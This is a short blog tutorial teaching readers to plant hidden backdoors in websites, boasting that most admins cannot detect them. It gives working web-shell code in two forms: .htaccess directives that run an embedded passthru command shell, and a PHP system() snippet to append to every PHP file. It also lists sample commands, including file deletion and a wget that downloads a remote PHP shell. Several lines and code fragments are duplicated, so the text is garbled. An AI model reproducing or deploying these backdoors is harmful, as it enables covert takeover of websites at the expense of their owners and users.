In This Tutorial I Will Teach You Guys Two Methods of simple backdoors
Note:-90% webadmins cant detect these backdoors, so enjoy..
Method 1:-
Backdoor .htaccess file:
To backdoor .htaccess file of a
website.
website.
Add the code below to the .htaccessfile and change permission to 777 (chmod 777).
Code:-
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-
php .htaccess
# <?php passthru($_GET
['cmd']); ?>
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-
php .htaccess
# <?php passthru($_GET
['cmd']); ?>
Now goto:
Code:-
site.com/.htaccess?cmd=ls
site.com/.htaccess?cmd=ls
after = you can run a command of
your choice :).
your choice :).
Method 2:-
Backdoor all php files:
To Backdoor all php files using a small code.
Code:
<?php $cmd = <<<EOD
cmd
EOD;
if(isset($_REQUEST[$cmd])) {
system($_REQUEST[$cmd]); } ?>
cmd
EOD;
if(isset($_REQUEST[$cmd])) {
system($_REQUEST[$cmd]); } ?>
Append the above code into all PHP files of the website.
Now goto the:
backdooredsite.com/
phpfile.php?cmd=
phpfile.php?cmd=
After the equal sign add your
command.
command.
Sample Commands:-
Code:-
ls = Display the contents of
the current directory
ls -a = Display also hidden
files and hidden directories
rm name = Remove a file or
directory called name
wget http://site.com/
shell.txt;mv shell.txt
shell.php = Upload php shell
the current directory
ls -a = Display also hidden
files and hidden directories
rm name = Remove a file or
directory called name
wget http://site.com/
shell.txt;mv shell.txt
shell.php = Upload php shell
Thats It Enjoy Simple and Effective Backdooring..
Ichsan Bahri
I'm Ichsan. A full time web designer. I enjoy to make modern template. I love create blogger template and write about web design, blogger. Now I'm working with Themeforest. You can buy our templates from Themeforest.
Website: http://sagoe.net/
No Comment to " Simple and Effective Backdoor Technique.. "